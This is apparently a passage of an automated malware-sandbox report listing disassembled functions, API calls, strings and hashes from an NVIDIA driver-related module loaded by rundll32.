Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DirectoryLocalSystem$AllocErrorFreeLast
String ID:
API String ID: 3438206570-0
Opcode ID: e8e0697e775eeb8f850b266a739133e9cdd53a1c2cc3d1dc94198358dc3c644c
Instruction ID: 2848b008fde699b96f7b27c0efa2d658ad49d7b175e764a473085e169d517bbf
Opcode Fuzzy Hash: e8e0697e775eeb8f850b266a739133e9cdd53a1c2cc3d1dc94198358dc3c644c
Instruction Fuzzy Hash: E8F05B62F0470342EF5C9BB5E46553951D26F88BC1F948079C55EC63DCED3CD4844600

Function 00007FFDFA996F50 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA9971F6

Part of subcall function 00007FFDFA979490: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA9794AD

Strings

UTF-16LEUNICODE, xrefs: 00007FFDFA99719A
UTF-8, xrefs: 00007FFDFA997179
ccs, xrefs: 00007FFDFA997142

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1b582fcbfd5ae116e6c977fbe4241b2ac0ebb8df1f688c77ef59e994b4d86bb2
Instruction ID: d2daad90d81f6eca06161917484055fad873106a47406df0d4943567cee3a952
Opcode Fuzzy Hash: 1b582fcbfd5ae116e6c977fbe4241b2ac0ebb8df1f688c77ef59e994b4d86bb2
Instruction Fuzzy Hash: ED81B431F0C252A6F77C4A2886B0A382BB09F197CCFD554B1CA2EC62DDDF2DA9418301

Function 00007FFDFA8B8048 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8B8085
new.LIBCMT ref: 00007FFDFA8B80B2

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

new.LIBCMT ref: 00007FFDFA8B80CF

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9468A4

Strings

WPPLogging, xrefs: 00007FFDFA8B81AD, 00007FFDFA8B81BC

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: WPPLogging
API String ID: 118556049-124961775
Opcode ID: 632718154eb13e6c30cdffa042e1edc4f4f12a6353a53bda1ce3956de7731feb
Instruction ID: 25157993b1820ade50cf129802e7cf0973001eb805467172d174811e8be4758c
Opcode Fuzzy Hash: 632718154eb13e6c30cdffa042e1edc4f4f12a6353a53bda1ce3956de7731feb
Instruction Fuzzy Hash: 03518932B15B4185EB18CB61E860AAC33B4FB44B98F844676CE6D57BD9DF78E491C380

Function 00007FFDFA92DDE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA92DE57

Part of subcall function 00007FFDFA8DE228: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE2EB

Strings

GridCloudLicensingTrustedStorage.cpp, xrefs: 00007FFDFA92DE94
Failed to allocate memory, xrefs: 00007FFDFA92DE47
_tsReadContent, xrefs: 00007FFDFA92DEBB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Init_thread_footerswprintf
String ID: Failed to allocate memory$GridCloudLicensingTrustedStorage.cpp$_tsReadContent
API String ID: 732731317-3783116900
Opcode ID: 7cc8c6e66dca87481643cac785d54a8b8033590987d2e515fa86d6acfb73afbf
Instruction ID: 3228255cf9b6bc4b99fbfcd167a6f4ac28f6e8fc773444554eb3c5950a1773cf
Opcode Fuzzy Hash: 7cc8c6e66dca87481643cac785d54a8b8033590987d2e515fa86d6acfb73afbf
Instruction Fuzzy Hash: 8A516B32B18B8299E714DB20E450AED77A4FB44398F901176EA6C57BADDF3CE145CB40

Function 00007FFDFA8B73C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFDFA8B74C7
new.LIBCMT ref: 00007FFDFA8B74DC
CloseHandle.KERNEL32 ref: 00007FFDFA8B751E

Strings

.log, xrefs: 00007FFDFA8B73FF, 00007FFDFA8B7412

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .log
API String ID: 3498533004-299349702
Opcode ID: 55d1a9028f26af799bb06fc40ccd591269aa111893101cd608a499a98079780f
Instruction ID: d5c22904791a21ea23785621cf00837c1cbf7b00decf0581c3d07973413a6fb6
Opcode Fuzzy Hash: 55d1a9028f26af799bb06fc40ccd591269aa111893101cd608a499a98079780f
Instruction Fuzzy Hash: BF41A032716B4295EB18DF31D4A0AAC23A0FB45B88F846276DA2D97BD9DF38E515C340

Function 00007FFDFA945060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FFDFA944FF7,?,?,00000000,00007FFDFA945263,?,?,00000000,00007FFDFA945500,?,?,?,00007FFDFA8DF206), ref: 00007FFDFA94507F
GetProcAddress.KERNEL32(?,?,00000000,00007FFDFA944FF7,?,?,00000000,00007FFDFA945263,?,?,00000000,00007FFDFA945500,?,?,?,00007FFDFA8DF206), ref: 00007FFDFA945096

Strings

nvapi_Direct_GetMethod, xrefs: 00007FFDFA945085
nvapi_QueryInterface, xrefs: 00007FFDFA945078

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: nvapi_Direct_GetMethod$nvapi_QueryInterface
API String ID: 190572456-541830060
Opcode ID: d680ba42e6397bfd4bcb16b1e5d61a8a8567ead19b88992c526a86b536d0f24f
Instruction ID: 48c60a748be4e79f796e5b22ceb41ad4332393de74c2c591a6a196a7f7bb907a
Opcode Fuzzy Hash: d680ba42e6397bfd4bcb16b1e5d61a8a8567ead19b88992c526a86b536d0f24f
Instruction Fuzzy Hash: 9F414F60B09F0355EB5C8795BDB093432A5AF8C794B9445BED93E863E8EE2CEA458310

Function 00007FFDFA96B8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00007FFDFA96B930
GetLastError.KERNEL32 ref: 00007FFDFA96B955

Part of subcall function 00007FFDFA96ADF0: _Init_thread_footer.LIBCMT ref: 00007FFDFA96AE4A

_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA96BA0D

Part of subcall function 00007FFDFA96C670: GetFileAttributesW.KERNEL32 ref: 00007FFDFA96C6B7

Strings

boost::filesystem::create_directory, xrefs: 00007FFDFA96B9BF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AttributesCreateDirectoryErrorExceptionFileInit_thread_footerLastThrow
String ID: boost::filesystem::create_directory
API String ID: 724045827-2941204237
Opcode ID: 0be57c52dd55e4bdb212c85267b57fad735851d4c37a9902dfc115765fa4dbd2
Instruction ID: 32a692070c0c482dac3930e8bb1199f37af09b4075048984a4bc1e568890e291
Opcode Fuzzy Hash: 0be57c52dd55e4bdb212c85267b57fad735851d4c37a9902dfc115765fa4dbd2
Instruction Fuzzy Hash: C5318432618B8681EB649F14E4607AA73A0FF44754F944271EAAC877DDEF3CD545CB00

Function 00007FFDFA969BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00007FFDFA969637), ref: 00007FFDFA969C09
GetProcAddress.KERNEL32(?,?,?,00007FFDFA969637), ref: 00007FFDFA969C19

Strings

KERNEL32.DLL, xrefs: 00007FFDFA969C02
GetTickCount64, xrefs: 00007FFDFA969C12

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetTickCount64$KERNEL32.DLL
API String ID: 1646373207-3320051239
Opcode ID: dc403231dfa1d52cf7b6050baa07f30946f08faffa56d843578ffbb4075026e3
Instruction ID: a7cde60e93db41372ecfbfc791d232f7262c2e07e444e1733c3158c9ba0a6a0d
Opcode Fuzzy Hash: dc403231dfa1d52cf7b6050baa07f30946f08faffa56d843578ffbb4075026e3
Instruction Fuzzy Hash: E431D322B19A8282DF0CCF19E56056973A0EF94B94F448176D63E873EDDF2CD495C300

Function 00007FFDFA8DE43C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00007FFDFA8DE46D

Part of subcall function 00007FFDFA8DE228: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE2EB

Strings

Create Sync Proxy singlton error, xrefs: 00007FFDFA8DE506
NvXDCore.cpp, xrefs: 00007FFDFA8DE4AE, 00007FFDFA8DE4BD
GetSyncProxy, xrefs: 00007FFDFA8DE4DE, 00007FFDFA8DE4ED

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CreateInit_thread_footerInstance
String ID: Create Sync Proxy singlton error$GetSyncProxy$NvXDCore.cpp
API String ID: 3436645735-4261199731
Opcode ID: 991a21e73c6d4c671791728da31033ebcb8c2e98bda0386184e0adc56be0fd8b
Instruction ID: e253b2f2ae4a74e46856d403fc64cda73d83b8ad74c5ae6c7c3dadc3f5e7e042
Opcode Fuzzy Hash: 991a21e73c6d4c671791728da31033ebcb8c2e98bda0386184e0adc56be0fd8b
Instruction Fuzzy Hash: A931F632B15B429DE714DF60E4506ED33B9EB4435CF800676EA6D56AA9EE38D219C380

Function 00007FFDFA8AADB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,?,cryptnet.dll,00007FFDFA8AA9DB), ref: 00007FFDFA8AADDD
LocalAlloc.KERNEL32(?,?,cryptnet.dll,00007FFDFA8AA9DB), ref: 00007FFDFA8AADF9
GetSystemDirectoryW.KERNEL32(?,?,cryptnet.dll,00007FFDFA8AA9DB), ref: 00007FFDFA8AAE0C

Strings

cryptnet.dll, xrefs: 00007FFDFA8AADC7

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DirectorySystem$AllocLocal
String ID: cryptnet.dll
API String ID: 1371172169-1563376703
Opcode ID: 41d284b39d861a69d634d39cc0ac6990f4b671fd7f177f07053520ddd399bce1
Instruction ID: 59b020033b14e03334533555b29d70d8343ad32b0f2e3eac34c6fd38cad26782
Opcode Fuzzy Hash: 41d284b39d861a69d634d39cc0ac6990f4b671fd7f177f07053520ddd399bce1
Instruction Fuzzy Hash: 2011E426B19342C6EB08AF62E460578B3A1FF48F84B884075DE5D47BC9EF3CE4628310

Function 00007FFDFA8DE30C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::current_exception.LIBCMT ref: 00007FFDFA8DE367
std::runtime_error::runtime_error.LIBCPMT ref: 00007FFDFA8DE38A

Part of subcall function 00007FFDFA8B0A2C: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B0A68

_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8DE39B

Part of subcall function 00007FFDFA971390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97140D
Part of subcall function 00007FFDFA971390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97144C

Strings

SHGetFolderPathW failed with , xrefs: 00007FFDFA8DE370

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrow__std_exception_copystd::current_exceptionstd::runtime_error::runtime_error
String ID: SHGetFolderPathW failed with
API String ID: 530891933-2816540289
Opcode ID: 58610502b58b0b572c1adac7209f5f57e80d41dadf13108b99969dd46fc7d3b2
Instruction ID: 1318f7618c41d4ff0d5fadbf34a57302e59008ca07afef9a7ac2ac5f1269892a
Opcode Fuzzy Hash: 58610502b58b0b572c1adac7209f5f57e80d41dadf13108b99969dd46fc7d3b2
Instruction Fuzzy Hash: 2121C53271878282EB249B61E4A4BAA7360FF84790F805276DB6D476EDDF7CD505C740

Function 00007FFDFA8B3FD4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8B4029

Strings

RegQueryValueEx, xrefs: 00007FFDFA8B4049
c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FFDFA8B4074
void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FFDFA8B407B

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: QueryValue
String ID: RegQueryValueEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
API String ID: 3660427363-2563057211
Opcode ID: 6403df39ea2b4c8683c83ac7e8edc363348eace101ee43b770daa147beb4f0ec
Instruction ID: 8b095a30fcf66da165d7174aa79a506f53cba3dc89b9101fd2bd66dea6a7e227
Opcode Fuzzy Hash: 6403df39ea2b4c8683c83ac7e8edc363348eace101ee43b770daa147beb4f0ec
Instruction Fuzzy Hash: 3411A831B29B4381EB64CB14E461B6A7360FB85784F402172E66D43AEDDF7CD545CB40

Function 00007FFDFA8B3C94 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8B3CEB

Strings

c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FFDFA8B3D22
RegOpenKeyEx, xrefs: 00007FFDFA8B3CF7
void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FFDFA8B3D29

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Open
